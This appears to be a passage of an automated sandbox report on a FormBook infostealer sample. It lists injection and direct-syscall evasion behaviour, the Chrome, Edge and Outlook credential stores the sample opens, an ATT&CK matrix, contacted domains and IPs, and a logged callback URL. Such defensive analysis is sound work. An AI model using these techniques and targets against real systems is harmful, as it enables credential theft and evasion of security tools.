                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_01942B57 mov eax, dword ptr fs:[00000030h]3_2_01942B57
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_01942B57 mov eax, dword ptr fs:[00000030h]3_2_01942B57
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_01942B57 mov eax, dword ptr fs:[00000030h]3_2_01942B57
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_01942B57 mov eax, dword ptr fs:[00000030h]3_2_01942B57
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_01906B40 mov eax, dword ptr fs:[00000030h]3_2_01906B40
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_01906B40 mov eax, dword ptr fs:[00000030h]3_2_01906B40
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_0193AB40 mov eax, dword ptr fs:[00000030h]3_2_0193AB40
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_01918B42 mov eax, dword ptr fs:[00000030h]3_2_01918B42
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_01868B50 mov eax, dword ptr fs:[00000030h]3_2_01868B50
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_01924B4B mov eax, dword ptr fs:[00000030h]3_2_01924B4B
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_01924B4B mov eax, dword ptr fs:[00000030h]3_2_01924B4B
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_0186CB7E mov eax, dword ptr fs:[00000030h]3_2_0186CB7E
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_0187EA80 mov eax, dword ptr fs:[00000030h]3_2_0187EA80
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_0187EA80 mov eax, dword ptr fs:[00000030h]3_2_0187EA80
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_0187EA80 mov eax, dword ptr fs:[00000030h]3_2_0187EA80
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_0187EA80 mov eax, dword ptr fs:[00000030h]3_2_0187EA80
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_0187EA80 mov eax, dword ptr fs:[00000030h]3_2_0187EA80
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_0187EA80 mov eax, dword ptr fs:[00000030h]3_2_0187EA80
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_0187EA80 mov eax, dword ptr fs:[00000030h]3_2_0187EA80
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_0187EA80 mov eax, dword ptr fs:[00000030h]3_2_0187EA80
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_0187EA80 mov eax, dword ptr fs:[00000030h]3_2_0187EA80
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_01944A80 mov eax, dword ptr fs:[00000030h]3_2_01944A80
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018A8A90 mov edx, dword ptr fs:[00000030h]3_2_018A8A90
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_01878AA0 mov eax, dword ptr fs:[00000030h]3_2_01878AA0
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_01878AA0 mov eax, dword ptr fs:[00000030h]3_2_01878AA0
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018C6AA4 mov eax, dword ptr fs:[00000030h]3_2_018C6AA4
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018C6ACC mov eax, dword ptr fs:[00000030h]3_2_018C6ACC
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018C6ACC mov eax, dword ptr fs:[00000030h]3_2_018C6ACC
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018C6ACC mov eax, dword ptr fs:[00000030h]3_2_018C6ACC
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_01870AD0 mov eax, dword ptr fs:[00000030h]3_2_01870AD0
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018A4AD0 mov eax, dword ptr fs:[00000030h]3_2_018A4AD0
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018A4AD0 mov eax, dword ptr fs:[00000030h]3_2_018A4AD0
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018AAAEE mov eax, dword ptr fs:[00000030h]3_2_018AAAEE
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018AAAEE mov eax, dword ptr fs:[00000030h]3_2_018AAAEE
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018FCA11 mov eax, dword ptr fs:[00000030h]3_2_018FCA11
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_0189EA2E mov eax, dword ptr fs:[00000030h]3_2_0189EA2E
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018ACA24 mov eax, dword ptr fs:[00000030h]3_2_018ACA24
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018ACA38 mov eax, dword ptr fs:[00000030h]3_2_018ACA38
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_01894A35 mov eax, dword ptr fs:[00000030h]3_2_01894A35
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_01894A35 mov eax, dword ptr fs:[00000030h]3_2_01894A35
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_01880A5B mov eax, dword ptr fs:[00000030h]3_2_01880A5B
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_01880A5B mov eax, dword ptr fs:[00000030h]3_2_01880A5B
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_01876A50 mov eax, dword ptr fs:[00000030h]3_2_01876A50
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_01876A50 mov eax, dword ptr fs:[00000030h]3_2_01876A50
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_01876A50 mov eax, dword ptr fs:[00000030h]3_2_01876A50
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_01876A50 mov eax, dword ptr fs:[00000030h]3_2_01876A50
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_01876A50 mov eax, dword ptr fs:[00000030h]3_2_01876A50
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_01876A50 mov eax, dword ptr fs:[00000030h]3_2_01876A50
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_01876A50 mov eax, dword ptr fs:[00000030h]3_2_01876A50
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018ACA6F mov eax, dword ptr fs:[00000030h]3_2_018ACA6F
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018ACA6F mov eax, dword ptr fs:[00000030h]3_2_018ACA6F
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Found direct / indirect Syscall (likely to bypass EDR)
                Source: C:\Program Files (x86)\GxZHbvtdFNhFBEJpgwNUdJFuiqAllYkBLUyAxDhpaJ\jCNfinsYqEsIM.exeNtQueryVolumeInformationFile: Direct from: 0x76F12F2CJump to behavior
                Source: C:\Program Files (x86)\GxZHbvtdFNhFBEJpgwNUdJFuiqAllYkBLUyAxDhpaJ\jCNfinsYqEsIM.exeNtQuerySystemInformation: Direct from: 0x76F148CCJump to behavior
                Source: C:\Program Files (x86)\GxZHbvtdFNhFBEJpgwNUdJFuiqAllYkBLUyAxDhpaJ\jCNfinsYqEsIM.exeNtAllocateVirtualMemory: Direct from: 0x76F148ECJump to behavior
                Source: C:\Program Files (x86)\GxZHbvtdFNhFBEJpgwNUdJFuiqAllYkBLUyAxDhpaJ\jCNfinsYqEsIM.exeNtQueryAttributesFile: Direct from: 0x76F12E6CJump to behavior
                Source: C:\Program Files (x86)\GxZHbvtdFNhFBEJpgwNUdJFuiqAllYkBLUyAxDhpaJ\jCNfinsYqEsIM.exeNtReadVirtualMemory: Direct from: 0x76F12E8CJump to behavior
                Source: C:\Program Files (x86)\GxZHbvtdFNhFBEJpgwNUdJFuiqAllYkBLUyAxDhpaJ\jCNfinsYqEsIM.exeNtCreateKey: Direct from: 0x76F12C6CJump to behavior
                Source: C:\Program Files (x86)\GxZHbvtdFNhFBEJpgwNUdJFuiqAllYkBLUyAxDhpaJ\jCNfinsYqEsIM.exeNtSetInformationThread: Direct from: 0x76F12B4CJump to behavior
                Source: C:\Program Files (x86)\GxZHbvtdFNhFBEJpgwNUdJFuiqAllYkBLUyAxDhpaJ\jCNfinsYqEsIM.exeNtClose: Direct from: 0x76F12B6C
                Source: C:\Program Files (x86)\GxZHbvtdFNhFBEJpgwNUdJFuiqAllYkBLUyAxDhpaJ\jCNfinsYqEsIM.exeNtAllocateVirtualMemory: Direct from: 0x76F13C9CJump to behavior
                Source: C:\Program Files (x86)\GxZHbvtdFNhFBEJpgwNUdJFuiqAllYkBLUyAxDhpaJ\jCNfinsYqEsIM.exeNtWriteVirtualMemory: Direct from: 0x76F1490CJump to behavior
                Source: C:\Program Files (x86)\GxZHbvtdFNhFBEJpgwNUdJFuiqAllYkBLUyAxDhpaJ\jCNfinsYqEsIM.exeNtCreateUserProcess: Direct from: 0x76F1371CJump to behavior
                Source: C:\Program Files (x86)\GxZHbvtdFNhFBEJpgwNUdJFuiqAllYkBLUyAxDhpaJ\jCNfinsYqEsIM.exeNtTerminateThread: Direct from: 0x76F12FCCJump to behavior
                Source: C:\Program Files (x86)\GxZHbvtdFNhFBEJpgwNUdJFuiqAllYkBLUyAxDhpaJ\jCNfinsYqEsIM.exeNtCreateFile: Direct from: 0x76F12FECJump to behavior
                Source: C:\Program Files (x86)\GxZHbvtdFNhFBEJpgwNUdJFuiqAllYkBLUyAxDhpaJ\jCNfinsYqEsIM.exeNtOpenFile: Direct from: 0x76F12DCCJump to behavior
                Source: C:\Program Files (x86)\GxZHbvtdFNhFBEJpgwNUdJFuiqAllYkBLUyAxDhpaJ\jCNfinsYqEsIM.exeNtQueryInformationToken: Direct from: 0x76F12CACJump to behavior
                Source: C:\Program Files (x86)\GxZHbvtdFNhFBEJpgwNUdJFuiqAllYkBLUyAxDhpaJ\jCNfinsYqEsIM.exeNtAllocateVirtualMemory: Direct from: 0x76F12BECJump to behavior
                Source: C:\Program Files (x86)\GxZHbvtdFNhFBEJpgwNUdJFuiqAllYkBLUyAxDhpaJ\jCNfinsYqEsIM.exeNtDeviceIoControlFile: Direct from: 0x76F12AECJump to behavior
                Source: C:\Program Files (x86)\GxZHbvtdFNhFBEJpgwNUdJFuiqAllYkBLUyAxDhpaJ\jCNfinsYqEsIM.exeNtSetInformationThread: Direct from: 0x76F063F9Jump to behavior
                Source: C:\Program Files (x86)\GxZHbvtdFNhFBEJpgwNUdJFuiqAllYkBLUyAxDhpaJ\jCNfinsYqEsIM.exeNtOpenSection: Direct from: 0x76F12E0CJump to behavior
                Source: C:\Program Files (x86)\GxZHbvtdFNhFBEJpgwNUdJFuiqAllYkBLUyAxDhpaJ\jCNfinsYqEsIM.exeNtMapViewOfSection: Direct from: 0x76F12D1CJump to behavior
                Source: C:\Program Files (x86)\GxZHbvtdFNhFBEJpgwNUdJFuiqAllYkBLUyAxDhpaJ\jCNfinsYqEsIM.exeNtResumeThread: Direct from: 0x76F136ACJump to behavior
                Source: C:\Program Files (x86)\GxZHbvtdFNhFBEJpgwNUdJFuiqAllYkBLUyAxDhpaJ\jCNfinsYqEsIM.exeNtCreateMutant: Direct from: 0x76F135CCJump to behavior
                Source: C:\Program Files (x86)\GxZHbvtdFNhFBEJpgwNUdJFuiqAllYkBLUyAxDhpaJ\jCNfinsYqEsIM.exeNtWriteVirtualMemory: Direct from: 0x76F12E3CJump to behavior
                Source: C:\Program Files (x86)\GxZHbvtdFNhFBEJpgwNUdJFuiqAllYkBLUyAxDhpaJ\jCNfinsYqEsIM.exeNtNotifyChangeKey: Direct from: 0x76F13C2CJump to behavior
                Source: C:\Program Files (x86)\GxZHbvtdFNhFBEJpgwNUdJFuiqAllYkBLUyAxDhpaJ\jCNfinsYqEsIM.exeNtClose: Direct from: 0x76F07B2E
                Source: C:\Program Files (x86)\GxZHbvtdFNhFBEJpgwNUdJFuiqAllYkBLUyAxDhpaJ\jCNfinsYqEsIM.exeNtProtectVirtualMemory: Direct from: 0x76F12F9CJump to behavior
                Source: C:\Program Files (x86)\GxZHbvtdFNhFBEJpgwNUdJFuiqAllYkBLUyAxDhpaJ\jCNfinsYqEsIM.exeNtSetInformationProcess: Direct from: 0x76F12C5CJump to behavior
                Source: C:\Program Files (x86)\GxZHbvtdFNhFBEJpgwNUdJFuiqAllYkBLUyAxDhpaJ\jCNfinsYqEsIM.exeNtOpenKeyEx: Direct from: 0x76F12B9CJump to behavior
                Source: C:\Program Files (x86)\GxZHbvtdFNhFBEJpgwNUdJFuiqAllYkBLUyAxDhpaJ\jCNfinsYqEsIM.exeNtQueryInformationProcess: Direct from: 0x76F12C26Jump to behavior
                Source: C:\Program Files (x86)\GxZHbvtdFNhFBEJpgwNUdJFuiqAllYkBLUyAxDhpaJ\jCNfinsYqEsIM.exeNtResumeThread: Direct from: 0x76F12FBCJump to behavior
                Source: C:\Program Files (x86)\GxZHbvtdFNhFBEJpgwNUdJFuiqAllYkBLUyAxDhpaJ\jCNfinsYqEsIM.exeNtDelayExecution: Direct from: 0x76F12DDCJump to behavior
                Source: C:\Program Files (x86)\GxZHbvtdFNhFBEJpgwNUdJFuiqAllYkBLUyAxDhpaJ\jCNfinsYqEsIM.exeNtReadFile: Direct from: 0x76F12ADCJump to behavior
                Source: C:\Program Files (x86)\GxZHbvtdFNhFBEJpgwNUdJFuiqAllYkBLUyAxDhpaJ\jCNfinsYqEsIM.exeNtQuerySystemInformation: Direct from: 0x76F12DFCJump to behavior
                Source: C:\Program Files (x86)\GxZHbvtdFNhFBEJpgwNUdJFuiqAllYkBLUyAxDhpaJ\jCNfinsYqEsIM.exeNtAllocateVirtualMemory: Direct from: 0x76F12BFCJump to behavior
                Injects a PE file into a foreign processes
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeMemory written: C:\Users\user\Desktop\hgq5nzWJll.exe base: 400000 value starts with: 4D5AJump to behavior
                Maps a DLL or memory area into another process
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeSection loaded: NULL target: C:\Program Files (x86)\GxZHbvtdFNhFBEJpgwNUdJFuiqAllYkBLUyAxDhpaJ\jCNfinsYqEsIM.exe protection: execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeSection loaded: NULL target: C:\Windows\SysWOW64\cacls.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: NULL target: C:\Program Files (x86)\GxZHbvtdFNhFBEJpgwNUdJFuiqAllYkBLUyAxDhpaJ\jCNfinsYqEsIM.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: NULL target: C:\Program Files (x86)\GxZHbvtdFNhFBEJpgwNUdJFuiqAllYkBLUyAxDhpaJ\jCNfinsYqEsIM.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                Modifies the context of a thread in another process (thread injection)
                Source: C:\Windows\SysWOW64\cacls.exeThread register set: target process: 7020Jump to behavior
                Queues an APC in another process (thread injection)
                Source: C:\Windows\SysWOW64\cacls.exeThread APC queued: target process: C:\Program Files (x86)\GxZHbvtdFNhFBEJpgwNUdJFuiqAllYkBLUyAxDhpaJ\jCNfinsYqEsIM.exeJump to behavior
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeProcess created: C:\Users\user\Desktop\hgq5nzWJll.exe "C:\Users\user\Desktop\hgq5nzWJll.exe"Jump to behavior
                Source: C:\Program Files (x86)\GxZHbvtdFNhFBEJpgwNUdJFuiqAllYkBLUyAxDhpaJ\jCNfinsYqEsIM.exeProcess created: C:\Windows\SysWOW64\cacls.exe "C:\Windows\SysWOW64\cacls.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: jCNfinsYqEsIM.exe, 00000007.00000002.2619971980.0000000001920000.00000002.00000001.00040000.00000000.sdmp, jCNfinsYqEsIM.exe, 00000007.00000000.1892542885.0000000001920000.00000002.00000001.00040000.00000000.sdmp, jCNfinsYqEsIM.exe, 00000009.00000000.2034617018.0000000001A61000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: jCNfinsYqEsIM.exe, 00000007.00000002.2619971980.0000000001920000.00000002.00000001.00040000.00000000.sdmp, jCNfinsYqEsIM.exe, 00000007.00000000.1892542885.0000000001920000.00000002.00000001.00040000.00000000.sdmp, jCNfinsYqEsIM.exe, 00000009.00000000.2034617018.0000000001A61000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: jCNfinsYqEsIM.exe, 00000007.00000002.2619971980.0000000001920000.00000002.00000001.00040000.00000000.sdmp, jCNfinsYqEsIM.exe, 00000007.00000000.1892542885.0000000001920000.00000002.00000001.00040000.00000000.sdmp, jCNfinsYqEsIM.exe, 00000009.00000000.2034617018.0000000001A61000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: jCNfinsYqEsIM.exe, 00000007.00000002.2619971980.0000000001920000.00000002.00000001.00040000.00000000.sdmp, jCNfinsYqEsIM.exe, 00000007.00000000.1892542885.0000000001920000.00000002.00000001.00040000.00000000.sdmp, jCNfinsYqEsIM.exe, 00000009.00000000.2034617018.0000000001A61000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: yProgram Manager
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeQueries volume information: C:\Users\user\Desktop\hgq5nzWJll.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 3.2.hgq5nzWJll.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.hgq5nzWJll.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000008.00000002.2621191548.0000000003270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.2620141085.00000000015D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.1967405892.0000000001B90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.2620684145.0000000002F80000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.2621124950.0000000003220000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.2618678036.0000000002C50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.1965649962.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.1967699628.0000000001D20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Windows\SysWOW64\cacls.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Windows\SysWOW64\cacls.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

                Remote Access Functionality

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 3.2.hgq5nzWJll.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.hgq5nzWJll.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000008.00000002.2621191548.0000000003270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.2620141085.00000000015D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.1967405892.0000000001B90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.2620684145.0000000002F80000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.2621124950.0000000003220000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.2618678036.0000000002C50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.1965649962.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.1967699628.0000000001D20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
                Services File Permissions Weakness                		412
                Process Injection                		1
                Masquerading                		1
                OS Credential Dumping                		121
                Security Software Discovery                		Remote Services1
                Email Collection                		1
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/Job1
                DLL Side-Loading                		1
                Abuse Elevation Control Mechanism                		1
                Disable or Modify Tools                		LSASS Memory2
                Process Discovery                		Remote Desktop Protocol1
                Archive Collected Data                		3
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                Services File Permissions Weakness                		41
                Virtualization/Sandbox Evasion                		Security Account Manager41
                Virtualization/Sandbox Evasion                		SMB/Windows Admin Shares1
                Data from Local System                		4
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
                DLL Side-Loading                		412
                Process Injection                		NTDS2
                File and Directory Discovery                		Distributed Component Object ModelInput Capture4
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets113
                System Information Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                Abuse Elevation Control Mechanism                		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items4
                Obfuscated Files or Information                		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                Services File Permissions Weakness                		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt2
                Software Packing                		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
                DLL Side-Loading                		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1588298 Sample: hgq5nzWJll.exe Startdate: 10/01/2025 Architecture: WINDOWS Score: 100 31 www.kubex.dev 2->31 33 www.glowups.life 2->33 35 5 other IPs or domains 2->35 45 Suricata IDS alerts for network traffic 2->45 47 Multi AV Scanner detection for submitted file 2->47 49 Yara detected FormBook 2->49 51 3 other signatures 2->51 10 hgq5nzWJll.exe 3 2->10         started        signatures3 process4 file5 29 C:\Users\user\AppData\...\hgq5nzWJll.exe.log, ASCII 10->29 dropped 63 Injects a PE file into a foreign processes 10->63 14 hgq5nzWJll.exe 10->14         started        signatures6 process7 signatures8 65 Maps a DLL or memory area into another process 14->65 17 jCNfinsYqEsIM.exe 14->17 injected process9 signatures10 43 Found direct / indirect Syscall (likely to bypass EDR) 17->43 20 cacls.exe 13 17->20         started        process11 signatures12 53 Tries to steal Mail credentials (via file / registry access) 20->53 55 Tries to harvest and steal browser information (history, passwords, etc) 20->55 57 Modifies the context of a thread in another process (thread injection) 20->57 59 3 other signatures 20->59 23 jCNfinsYqEsIM.exe 20->23 injected 27 firefox.exe 20->27         started        process13 dnsIp14 37 www.kubex.dev 217.160.0.183, 61138, 61139, 61140 ONEANDONE-ASBrauerstrasse48DE Germany 23->37 39 sido247.pro 84.32.84.32, 61142, 61143, 61144 NTT-LT-ASLT Lithuania 23->39 41 2 other IPs or domains 23->41 61 Found direct / indirect Syscall (likely to bypass EDR) 23->61 signatures15

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                hgq5nzWJll.exe76%VirustotalBrowse
                hgq5nzWJll.exe83%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
                hgq5nzWJll.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://www.88rtp.biz/oz0e/?GF=mlOXG&IJQ=N0iBPOr2h1wf3hrnovRBb1Y/GOEfnc+lKlX+67l0LxDwIz/NET6JyzkCPnJBSBJZztg4pX1Iwr0Nd76JZuhGaj9BaNcemEVJE4if1Cf0Ux8WzxQbGzZtN58=0%Avira URL Cloudsafe
